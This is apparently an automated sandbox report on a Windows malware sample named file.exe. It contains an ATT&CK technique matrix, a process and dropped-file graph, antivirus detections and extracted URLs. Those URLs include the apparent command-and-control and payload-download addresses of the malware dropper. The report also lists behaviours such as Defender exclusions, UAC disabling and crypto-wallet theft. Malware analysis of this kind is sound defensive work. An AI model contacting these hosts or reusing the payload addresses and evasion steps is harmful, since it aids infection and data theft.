                        | Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 4 Windows Service | 1 Access Token Manipulation | 21 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                        | Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 2 Registry Run Keys / Startup Folder | 4 Windows Service | 21 Software Packing | NTDS | 157 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Proxy | Traffic Duplication | Data Destruction |
                        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 413 Process Injection | 1 Timestomp | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 131 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 141 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry
                        Proc Filesystem13
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadow11
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation
                        Network Sniffing3
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd413
                        Process Injection
                        Input Capture1
                        Remote System Discovery
                        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Bootkit
                        Keylogging1
                        System Network Configuration Discovery
                        Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Behavior Graph ID: 1407460   Sample: file.exe   Startdate: 12/03/2024   Architecture: WINDOWS   Score: 100

Start [2]
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures
  Started: file.exe [10] (15 3); svchost.exe [15]; svchost.exe [17] (1 1)

file.exe [10]
  Network: 14.232.235.13 VNPT-AS-VNVNPTCorpVN Viet Nam; 74.103.66.15 UUNETUS United States; 98 other IPs or domains
  Dropped: C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft
  Signatures: Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; Disables UAC (registry); 3 other signatures
  Started: InstallUtil.exe [19]; powershell.exe [23] (21); WerFault.exe [25]

svchost.exe [15]
  Started: WerFault.exe [27]

InstallUtil.exe [19]
  Dropped: C:\Users\...\zrNC9V37VM40VjYOUVLhb0U4.exe, PE32; C:\Users\...\xYgVykjMJXKeoDKuEBWTMXD2.exe, PE32; C:\Users\...\xPkU0vAnxq9kCf406fqJmxI3.exe, PE32; 330 other malicious files
  Signatures: Drops script or batch files to the startup folder; Creates HTML files with .exe extension (expired dropper behavior); Writes many files with high entropy
  Started: 7g1UcaWDIadEWTPuXfBgjhjE.exe [29]; fwUkFVOLVOFs3NY104r7giRJ.exe [32]; MX6OxFuxXLJNkbD9F2dPLyyC.exe [34]; 16 other processes [41]

powershell.exe [23]
  Started: conhost.exe [37]; WmiPrvSE.exe [39]

7g1UcaWDIadEWTPuXfBgjhjE.exe [29]
  Dropped: C:\Users\user\AppData\Local\...\syncUpd.exe, PE32; C:\Users\user\AppData\Local\...\INetC.dll, PE32; C:\Users\user\AppData\...\BroomSetup.exe, PE32
  Started: syncUpd.exe [43]; BroomSetup.exe [47]

fwUkFVOLVOFs3NY104r7giRJ.exe [32]
  Dropped: C:\Users\...\fwUkFVOLVOFs3NY104r7giRJ.tmp, PE32
  Started: fwUkFVOLVOFs3NY104r7giRJ.tmp [49]

MX6OxFuxXLJNkbD9F2dPLyyC.exe [34]
  Dropped: 4 other malicious files
  Signatures: Writes many files with high entropy
  Started: MX6OxFuxXLJNkbD9F2dPLyyC.exe [51]; MX6OxFuxXLJNkbD9F2dPLyyC.exe [53]

16 other processes [41]
  Dropped: C:\Users\...\mlSjlt4YcfcpuVp4aQsoCouK.tmp, PE32; C:\Users\...\DAOYzG6VUKOTbMmRBP4iG9FF.tmp, PE32; C:\Users\...\uOoBNdE6Sm5DmPd13osCbhQm.tmp, PE32; 9 other malicious files
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found Tor onion address; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Started: DAOYzG6VUKOTbMmRBP4iG9FF.tmp [55]; FnzHBAPEbvEEx8ZWWEvo0R6a.tmp [57]; 51fuIpAxuIxVSFNlFyLCdDUf.exe [59]; 8aNg0kr81H7icHssfXxzSpJA.exe [61]

syncUpd.exe [43]
  Dropped: 12 other files (8 malicious)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found many strings related to Crypto-Wallets (likely being stolen); 6 other signatures

BroomSetup.exe [47]
  Started: cmd.exe [63]

fwUkFVOLVOFs3NY104r7giRJ.tmp [49]
  Dropped: C:\Users\user\AppData\...\weblinkanalyzer.exe, PE32; 16 other files (15 malicious)
  Started: weblinkanalyzer.exe [65]; weblinkanalyzer.exe [68]

MX6OxFuxXLJNkbD9F2dPLyyC.exe [51]
  Dropped: Opera_installer_2403121027455829404.dll, PE32

MX6OxFuxXLJNkbD9F2dPLyyC.exe [53]
  Dropped: Opera_installer_24031210274997611284.dll, PE32

DAOYzG6VUKOTbMmRBP4iG9FF.tmp [55]
  Dropped: 3 other files (2 malicious)

FnzHBAPEbvEEx8ZWWEvo0R6a.tmp [57]
  Dropped: 3 other files (2 malicious)

51fuIpAxuIxVSFNlFyLCdDUf.exe [59]
  Dropped: Opera_installer_24031210275393811096.dll, PE32

8aNg0kr81H7icHssfXxzSpJA.exe [61]
  Dropped: Opera_installer_24031210280932613620.dll, PE32

cmd.exe [63]
  Started: conhost.exe [70]

weblinkanalyzer.exe [65]
  Dropped: C:\...\DirectSoundDriver 2.36.198.67.exe, PE32

Source | Detection | Scanner | Label | Link
file.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
Source | Detection | Scanner | Label | Link
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | 100% | Avira | HEUR/AGEN.1315065 |
C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll | 0% | ReversingLabs | |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.172.128.145/3cd2b41cbde8fc9c.php | true | |
Name | Source | Malicious | Antivirus Detection | Reputation
                          http://195.16.74.230/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://legal.opera.com/termsMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpfalse
                              https://namecloudvideo.orgInstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                http://185.172.128.145/15f649199f40275b/freebl3.dllsyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                  http://15.204.49.148/files/Silent.d#InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://help.opera.com/latest/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                      https://download3.operacdn.com/SMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://policies.google.com/terms;MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpfalse
                                          https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3288684476.0000000035533000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2613936298.000000005DF34000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2903459816.000000005DE8C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2924292015.000000005DEE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            https://download.opera.com/nMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              http://185.172.128.187/ping.php?substr=sevenu7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software7MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://yip.su/redirect-InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    http://localhost:3001api/prefs/?product=$1&version=$2..MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                        https://download.opera.com/d51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2875499690.000000005DE2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://www.opera.com/download/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                            https://download.opera.com/fMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://midnight.bestsuDInstallUtil.exe, 00000008.00000002.3203681582.000000000372A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000002.00000003.1744726219.000002557D4FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744726219.000002557D40E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://15.204.49.148/files/Silent.0BInstallUtil.exe, 00000008.00000002.3203681582.000000000355A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    https://download3.operacdn.com/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001368000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://download.opera.com/I51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://185.172.128.145/15f649199f40275b/mozglue.dllsyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://turnitin.com/robot/crawlerinfo.html)cannot23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                            http://185.172.128.90/cpa/ping.php?substr=seven&s=ab7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2197262052.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3183903851.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3181621791.000000000096E000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3181533665.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3194499183.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3184023789.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3181428356.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3181834392.000000000084E000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3184608774.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://download.opera.com/C51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2581876700.00000000044F8000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2528084518.00000000044F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://iplogger.org/privacy/InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      http://www.innosetup.com/fwUkFVOLVOFs3NY104r7giRJ.tmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053165938.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053429105.0000000002138000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000000.2084798987.0000000000401000.00000020.00000001.01000000.00000017.sdmpfalse
                                                                                        https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=15HMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          https://crashpad.chromium.org/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                            https://addons.opera.com/en/extensions/details/dify-cashback/51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                              https://autoupdate.geo.opera.com/geolocation/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                https://autoupdate.geo.opera.com/NSMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000140B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://195.16.74.230/Aweblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://www.opera.com..MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                                                                                                          http://195.16.74.230/weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000946000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://iplogger.com/1luzzInstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
93.171.243.253 | unknown | Czech Republic | 8870 | OVDC-ASUA | false
212.110.188.202 | unknown | United Kingdom | 35425 | BYTEMARK-ASGB | false
24.230.33.96 | unknown | United States | 11232 | MIDCO-NETUS | false
